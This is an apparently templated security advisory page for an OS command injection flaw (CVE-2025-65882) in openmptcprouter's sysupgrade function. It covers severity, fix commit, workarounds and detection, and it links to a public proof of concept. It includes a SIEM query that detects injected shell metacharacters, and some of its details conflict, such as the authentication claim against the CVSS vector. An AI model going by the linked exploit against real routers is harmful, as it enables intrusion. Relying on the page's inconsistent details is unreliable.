CVE-2025-65882 – This vulnerability in openmptcprouter allows at... (How to Fix)

Q: What is the severity of CVE-2025-65882?

CVE-2025-65882 has a CVSS score of 9.8 (CRITICAL). This vulnerability in openmptcprouter allows attackers to write arbitrary files or execute arbitrary commands via improper neutralization of special elements used in an OS command (OS command injection). It affects all users running vulnerable versions of openmptcprouter.

📋 TL;DR

This vulnerability in openmptcprouter allows attackers to write arbitrary files or execute arbitrary commands via improper neutralization of special elements used in an OS command (OS command injection). It affects all users running vulnerable versions of openmptcprouter.

💻 Affected Systems

Products:

openmptcprouter

Versions: through version 0.64

Operating Systems: Linux-based router distributions

Default Config Vulnerable: ⚠️ Yes

Notes: Affects the sysupgrade functionality which is typically accessible to authenticated users.

📦 What is this software?

Openmptcprouter by Openmptcprouter

View all CVEs affecting Openmptcprouter →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with root-level arbitrary command execution leading to complete control of the router device.

🟠

Likely Case

Remote code execution allowing attackers to install malware, pivot to internal networks, or disrupt routing services.

🟢

If Mitigated

Limited impact if proper network segmentation and least privilege principles are implemented.

🌐 Internet-Facing: HIGH - openmptcprouter is typically deployed as an internet-facing router/gateway device.

🏢 Internal Only: MEDIUM - Could be exploited from internal networks if attacker gains initial access.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Proof of concept available in GitHub gist. Exploitation requires some level of access to the sysupgrade functionality.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Fixed in commit 09393d1c41a227bea7d5b85c0a06221b1302b25f and later

Vendor Advisory: https://github.com/Ysurac/openmptcprouter/commit/09393d1c41a227bea7d5b85c0a06221b1302b25f

Restart Required: Yes

Instructions:

1. Update openmptcprouter to latest version 2. Apply commit 09393d1c41a227bea7d5b85c0a06221b1302b25f 3. Restart the router services

🔧 Temporary Workarounds

Disable sysupgrade functionality

linux

Temporarily disable the vulnerable sysupgrade component

systemctl disable sysupgrade
chmod -x /usr/bin/sysupgrade

Restrict access to management interface

linux

Limit network access to openmptcprouter management interface

iptables -A INPUT -p tcp --dport 22 -s trusted_ip -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j DROP

🧯 If You Can't Patch

Implement strict network segmentation to isolate openmptcprouter from critical internal networks
Enable detailed logging and monitoring for any sysupgrade-related activities

🔍 How to Verify

Check if Vulnerable:

Check if running openmptcprouter version <= 0.64 and examine sysupgrade.c for vulnerable create_xor_ipad_opad function

Check Version:

cat /etc/openmptcprouter-version || openmptcprouter --version

Verify Fix Applied:

Verify commit 09393d1c41a227bea7d5b85c0a06221b1302b25f is applied and version > 0.64

📡 Detection & Monitoring

Log Indicators:

Unusual sysupgrade process executions
Unexpected file writes in system directories
Suspicious command execution patterns

Network Indicators:

Unusual outbound connections from router
Unexpected SSH or management interface access

SIEM Query:

process.name="sysupgrade" AND (cmdline="*;*" OR cmdline="*|*" OR cmdline="*`*")

📊 Metadata

CVE ID: CVE-2025-65882

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-78

EPSS Score: 0.19% exploit probability (40.1th percentile)

Published: December 9, 2025

Last Updated: January 2, 2026

🔗 References

http://openmptcprouter.com Product
https://gist.github.com/AradCohen/939ee50d60c4d2bd555a364615a5ab9c Exploit,Third Party Advisory
https://github.com/Ysurac/openmptcprouter/commit/09393d1c41a227bea7d5b85c0a06221b1302b25f Patch

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-65882, you might also want to check these: